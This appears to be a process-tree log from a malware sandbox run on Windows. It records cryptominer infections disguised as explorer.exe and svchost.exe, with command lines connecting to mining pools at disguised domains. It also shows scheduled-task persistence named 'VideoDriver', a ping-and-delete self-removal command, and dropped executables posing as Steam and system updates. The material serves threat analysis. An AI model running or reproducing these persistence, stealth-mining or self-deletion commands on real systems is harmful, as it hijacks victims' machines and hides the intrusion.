-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:9996
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵PID:4280
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵PID:9096
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵PID:9764
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
PID:9836
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵PID:9640
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵PID:8956
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
PID:6184
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵PID:2196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵PID:7512
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\6B01.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\6B01.exe"2⤵PID:7304
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
PID:5100
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
PID:7220
-
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:10232
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9228
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:10024
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7900
-
C:\Windows\SysWOW64\bulvhbgv\obbzyzmm.exeC:\Windows\SysWOW64\bulvhbgv\obbzyzmm.exe /d"C:\Users\Admin\AppData\Local\Temp\1683.exe"1⤵PID:5944
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:8272
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:4380
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7028
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3736
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9556
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7612
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9088
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9460
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8212
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:9392
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7780
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5136
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7316
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9504
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:1752
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6960
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6476
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10908
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9980
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8668
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11068
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5032
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10332
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:800
-
C:\Users\Admin\AppData\Roaming\vsuwtbhC:\Users\Admin\AppData\Roaming\vsuwtbh1⤵PID:8876
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8536
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10460
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10048
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5636
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5844
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11132